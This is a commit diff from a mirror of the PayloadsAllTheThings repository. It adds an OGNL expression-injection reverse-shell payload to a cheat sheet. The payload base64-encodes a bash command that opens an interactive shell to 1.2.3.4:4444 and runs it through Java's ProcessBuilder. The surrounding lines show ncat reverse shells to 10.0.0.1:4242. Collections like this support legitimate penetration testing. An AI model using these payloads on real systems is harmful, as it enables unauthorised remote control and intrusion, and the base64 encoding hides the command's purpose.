mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-04 18:40:41 +00:00
Adding reverse shell payload for OGNL
This commit is contained in:
parent
cbc6e78d2a
commit
3d9363fdc9
1 changed files with 7 additions and 0 deletions
|
@ -22,6 +22,7 @@
|
|||
* [Netcat BusyBox](#netcat-busybox)
|
||||
* [Netcat Traditional](#netcat-traditional)
|
||||
* [NodeJS](#nodejs)
|
||||
* [OGNL](#ognl)
|
||||
* [OpenSSL](#openssl)
|
||||
* [Perl](#perl)
|
||||
* [PHP](#php)
|
||||
|
@ -252,6 +253,12 @@ ncat 10.0.0.1 4242 -e /bin/bash
|
|||
ncat --udp 10.0.0.1 4242 -e /bin/bash
|
||||
```
|
||||
|
||||
### OGNL
|
||||
|
||||
```java
|
||||
(#a='echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xLjIuMy40LzQ0NDQgMD4mMScK | base64 -d | bash -i').(#b={'bash','-c',#a}).(#p=new java.lang.ProcessBuilder(#b)).(#process=#p.start())
|
||||
```
|
||||
|
||||
### OpenSSL
|
||||
|
||||
Attacker:
|
||||
|
|
Loading…
Reference in a new issue